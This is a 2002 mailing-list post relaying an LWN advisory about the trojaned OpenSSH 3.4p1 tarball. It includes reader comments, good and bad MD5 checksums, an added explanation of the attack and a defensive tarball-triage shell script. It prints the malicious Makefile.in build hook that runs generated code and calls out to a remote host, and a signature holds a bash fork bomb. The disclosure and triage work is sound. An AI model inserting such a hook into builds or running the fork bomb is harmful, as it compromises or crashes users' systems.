
[Savannah-hackers] OpenSSH 3.4p1 trojaned


From: Mark H. Weaver
Subject: [Savannah-hackers] OpenSSH 3.4p1 trojaned
Date: Thu, 01 Aug 2002 14:55:41 -0400

http://lwn.net/Articles/6524/

[...]

Trojan horse in OpenSSH 3.4p1 source distribution

   From:      Mikael Olsson <address@hidden>
   To:        address@hidden
   Subject:   openssh-3.4p1.tar.gz distribution recently trojaned
   Date:      Thu, 01 Aug 2002 13:20:47 +0200


From [27]http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

----- Forwarded message from Edwin Groothuis <address@hidden> -----

Date: Thu, 1 Aug 2002 16:55:51 +1000
From: Edwin Groothuis <address@hidden>
To: address@hidden
Subject: openssh-3.4p1.tar.gz trojaned

Greetings,

Just want to inform you that the OpenSSH package on ftp.openbsd.org
(and probably all its mirrors now) is trojaned:

    [28]ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz

The OpenBSD people have been informed about it (via email to
address@hidden and via irc.openprojects.org/#openbsd)


The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
 all: libopenbsd-compat.a
+       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
./bf-test.out &
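
Review bot: the recipe line added under `all:` should not be in a library build target: it compiles bf-test.c, runs the resulting binary, and hands the captured output to `sh` in the background, and the leading `@` keeps the command out of the build output. Nothing in building libopenbsd-compat.a needs to execute generated output, so the line should be dropped and any tree containing it treated as modified.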

bf-test.c[1] is nothing more than a wrapper which generates a
shell-script[2] which compiles itself and tries to connect to a
server running on 203.62.158.32:6667 (web.snsonline.net).

[1] [29]http://www.mavetju.org/~edwin/bf-test.c
[2] [30]http://www.mavetju.org/~edwin/bf-output.sh

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
ports system:
    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
    MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

Edwin

--
Edwin Groothuis      |            Personal website: [31]http://www.MavEtJu.org
address@hidden    |    Weblog: [32]http://www.mavetju.org/weblog/weblog.php
bash$ :(){ :|:&};:   | Interested in MUDs? [33]http://www.FatalDimensions.org/
   __________________________________________


     Trojan horse in OpenSSH 3.4p1 source distribution
   (Posted Aug 01, 2002 15:07 UTC (Thu) by craighagan) ([35]Post reply)

   This appears to be a FreeBSD ports thing. I build from
   sources downloaded from the openssh website within 24 hours
   of the release. I've double-checked said sources and
   do *not* see either the Makefile.in modification
   nor the bf-test.c source via find.

   I recommend other folks check their sources so that
   either the ports origin -- or a hack at openssh's distribution
   point can be confirmed.

     Trojan horse in OpenSSH 3.4p1 source distribution
   (Posted Aug 01, 2002 15:08 UTC (Thu) by craighagan) ([36]Post reply)

   Silly me. I forgot that -ports ftp's the software upon build.

     Trojan horse in OpenSSH 3.4p1 source distribution
   (Posted Aug 01, 2002 16:22 UTC (Thu) by erat) ([37]Post reply)

   I built 3.4p1 last night from a tarball downloaded from openssh.com.
   No trojan found, and the checksum matched the "good" checksum from the
   security alert.

                     Copyright (©) 2002, Eklektix, Inc.

References

   1. http://lwn.net/
   2. http://php.lwn.net/corp/advertise/text/visit.php3?adid=382
   3. http://php.lwn.net/mediakit/index.php3?s=t
   4. http://lwn.net/login
   5. http://lwn.net/newaccount
   6. http://lwn.net/Articles/5712/
   7. http://lwn.net/Articles/5052/
   8. http://lwn.net/Articles/4553/
   9. http://lwn.net/Articles/4151/
  10. http://lwn.net/Articles/3668/
  11. http://lwn.net/Articles/6524/?format=printable
  12. http://lwn.net/
  13. http://lwn.net/current/
  14. http://lwn.net/Archives/
  15. http://lwn.net/security
  16. http://www.linuxcalendar.com/
  17. http://old.lwn.net/Distributions/
  18. http://old.lwn.net/Gallery/
  19. http://lwn.net/KernelPatches/
  20. http://old.lwn.net/stocks
  21. http://old.lwn.net/
  22. http://lwn.net/op/About.lwn/
  23. http://php.lwn.net/corp/donate/
  24. http://lwn.net/mediakit
  25. http://lwn.net/headlines/
  26. http://lwn.net/op/Privacy.lwn/
  27. http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
  28. ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
  29. http://www.mavetju.org/~edwin/bf-test.c
  30. http://www.mavetju.org/~edwin/bf-output.sh
  31. http://www.MavEtJu.org/
  32. http://www.mavetju.org/weblog/weblog.php
  33. http://www.FatalDimensions.org/
  34. http://lwn.net/login
  35. http://lwn.net/Articles/6547/comment
  36. http://lwn.net/Articles/6550/comment
  37. http://lwn.net/Articles/6560/comment
  38. http://www.rackspace.com/
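
A triage check for a local copy of the tarball, as an added example that is not part of the original messages: it compares the file's MD5 with the two digests quoted in the report and looks for the bf-test indicators without building or running anything. The function names are hypothetical; the digests and the bf-test / Makefile.in names are taken from the report.

```shell
# Digests quoted in the report above (MD5 is the only digest the page gives).
GOOD_MD5=459c1d0262e939d6432f193c7a4ba8a8    # FreeBSD ports copy
TROJAN_MD5=3ac9bc346d736b4a51d676faa2a08a57  # trojaned copy

# Print the MD5 of a file using whichever tool the platform ships.
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | awk '{print $1}'
    elif command -v md5 >/dev/null 2>&1; then
        md5 -q "$1"
    else
        openssl md5 "$1" | awk '{print $NF}'
    fi
}

# Map a digest to a verdict; anything unlisted is "unknown", never "good".
classify_md5() {
    case "$1" in
        "$GOOD_MD5")   echo good ;;
        "$TROJAN_MD5") echo trojaned ;;
        *)             echo unknown ;;
    esac
}

# Return 0 if the archive carries the indicators described in the report:
# a bf-test.c member, or an openbsd-compat/Makefile.in that mentions bf-test.
# The archive is only listed and streamed to grep; nothing is unpacked to disk.
has_bf_test_indicator() {
    if tar -tzf "$1" 2>/dev/null | grep -q '/bf-test\.c$'; then
        return 0
    fi
    member=$(tar -tzf "$1" 2>/dev/null | grep 'openbsd-compat/Makefile\.in$' | head -n 1)
    [ -n "$member" ] || return 1
    tar -xzOf "$1" "$member" 2>/dev/null | grep -q 'bf-test'
}

# Combined verdict for one tarball path, e.g. "good indicator-absent".
triage_tarball() {
    verdict=$(classify_md5 "$(file_md5 "$1")")
    if has_bf_test_indicator "$1"; then
        echo "$verdict indicator-present"
    else
        echo "$verdict indicator-absent"
    fi
}

# When run as a script with a path argument, print the verdict for that file.
if [ "$#" -gt 0 ]; then triage_tarball "$1"; fi
```

A copy that reports `unknown` matches neither digest in the report and needs a comparison against a trusted source before it is built.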
